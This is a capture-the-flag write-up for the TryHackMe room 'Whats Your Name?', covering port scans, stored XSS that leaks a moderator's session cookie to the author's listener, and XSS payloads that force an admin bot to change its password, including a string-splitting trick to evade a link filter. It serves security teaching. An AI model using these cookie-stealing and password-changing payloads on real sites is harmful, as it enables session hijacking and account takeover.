🤨Whats Your Name?

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Link to room: https://tryhackme.com/r/room/whatsyourname

Machine version: whatsyournamev1.87

This writeup walks you through a room on TryHackMe created by tryhackme, 1337rce, l000g1c

1 - Port Scan

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.58.228
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 08:42 EEST
Nmap scan report for 10.10.58.228
Host is up (0.11s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 388.39 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,8081 10.10.58.228
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 08:51 EEST
Nmap scan report for 10.10.58.228
Host is up (0.10s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:57:0f:de:f3:a7:d2:11:ef:ba:c7:82:0f:f6:4c:58 (RSA)
|   256 f6:d1:12:7c:86:e0:34:6f:35:f8:d6:f8:3e:ce:fc:97 (ECDSA)
|_  256 f3:62:02:4b:3a:e4:5f:d8:12:fd:22:db:76:45:56:f0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8081/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Adtran 424RG FTTH gateway (92%), Linux 5.4 (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds

2 - Web server probing

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
10.10.58.228	worldwap.thm

3 - XSS

3a - Payload injection

After a minute or so, the moderator detonates the payload by browsing our registration submission and their browser sends us the following:

┌──(kali㉿kali)-[~]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.58.228 - - [01/May/2024 11:20:04] "GET /?mod_location=http://worldwap.thm/public/html/mod.php HTTP/1.1" 200 -
10.10.58.228 - - [01/May/2024 11:20:05] "GET /?mod_cookie=PHPSESSID=je78rbcm59vddlf9g5b4t3gsa0 HTTP/1.1" 200 -

3c - Mod flag

4 - Probing WORLDWAP

Most features on the website are static and do nothing. The only features that are dynamic are the chat and the change password pages.

4a - Change Password form

4b - Chat

This page is interesting. We can only talk with a bot named admin. We can reset the bot and clear the chat.

5 - A closer look at the chat

6 - Finding the correct payload

Through the discovered XSS vuln, we can make the bot send a forged request to change it password.

First, we copy what the request should look like by trying the change password page again:

await fetch("http://login.worldwap.thm/change_password.php", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "http://login.worldwap.thm/change_password.php",
    "body": "new_password=hello",
    "method": "POST",
    "mode": "cors"
});

A better and simple payload would be:

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send('new_password=hello');
</script>

We will clear the chat and try:

It did not work. If it doesn't work on our own browser, it will not work in the admin's browser. What is the problem? It turns out the payload is being modified before being stored, breaking everything:

We just need to bypass link detection and we are good to go!

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "htt" + "p://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send('new_password=hello');
</script>

We clear the chat and try again:

7 - Getting the flag

We reset the bot to trigger chat browsing. This should have changed the password of the admin's account. We try to login:

PreviousValley

Last updated 1 year ago

hashtagLicense

hashtag0 - Introduction

hashtag1 - Port Scan

hashtag1a - Discovery

hashtag1b - Versioning and OS fingerprinting

hashtag2 - Web server probing

hashtag3 - XSS

hashtag3a - Payload injection

hashtag3b - Cookie and location of mod

hashtag3c - Mod flag

hashtag4 - Probing WORLDWAP

hashtag4a - Change Password form

hashtag4b - Chat

hashtag5 - A closer look at the chat

hashtag6 - Finding the correct payload

hashtag7 - Getting the flag